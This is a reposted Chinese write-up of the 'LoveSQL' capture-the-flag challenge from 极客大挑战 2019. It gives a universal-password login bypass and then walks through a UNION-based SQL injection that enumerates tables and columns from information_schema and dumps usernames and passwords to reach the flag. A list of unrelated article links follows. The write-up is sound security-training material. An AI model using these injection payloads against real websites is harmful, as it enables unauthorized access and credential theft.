[极客大挑战 2019]LoveSQL 1
本文共 946 字,大约阅读时间需要 3 分钟。
一个比较简单的SQL注入题目,写一下做个笔记。
看到登录直接盲猜账号密码admin和password,然后在账号处进行注入,结果还给我试对了。看了一下网上大佬们的做法,发现我就是捡了个漏,正确做法其实是利用万能密码登录,登录后进行注入。接下来把正规做法记录一下:
万能密码如下:
1' or 1=1#,密码随便写。 
登陆成功,看了一下url,是以get方式进行传参。先在username处测试一下有没有注入点: ?username=1' order by 1%23&password=ads
没有报错,只是说账号密码错误。直到order by 4的时候,报错了: 
判断出有三个字段,接下来开始寻找注入点: ?username=1' union select 1,2,3%23&password=ads
很明显,2和3都是注入点,而且没有过滤,接下来直接写命令了。 ?username=1' union select 1,database(),3%23&password=ads 得到数据库名:geek! ?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=ads
geekuser,l0ve1ysq1 ?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=ads
id,username,password ?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=ads
flag{70dfe726-2d2d-443e-a90a-5f5c3163b305}
转载地址:http://jxpbi.baihongyu.com/
你可能感兴趣的文章
Android(二)数据存储和访问 之文件
查看>>
Android(三)数据存储之XML解析技术
查看>>
Android(三) 数据存储之二 SharedPreferences
查看>>
Android(三)数据存储之三SQLite嵌入式数据库
查看>>
Android(四)数据存储之四ContentProvider
查看>>
Android(四)数据存储之四网络
查看>>
Android(五)数据存储之五网络数据交互
查看>>
Android(五)数据存储之五网络多线程断点下载
查看>>
Android(六)Activity、请求码与结果码、Intent、广播、服务
查看>>
Android(六)通知、样式、主题、HTML
查看>>
浅谈 Facade 模式
查看>>
设计模式之Factory
查看>>
使用Hibernate进行大数据量的性能测试
查看>>
浅谈HTTP的无状态性
查看>>
程序调用飞信API发送免费短信(JAVA例子,其他语言一样用)
查看>>
向指定URL发送GET方法的请求(java)
查看>>
Oracle select in/exists/not in/not exits
查看>>
浅谈在Hibernate中使用Oracle sequence
查看>>
hibernate------hql总结
查看>>
Spring框架下PropertyPlaceholderConfigurer类
查看>>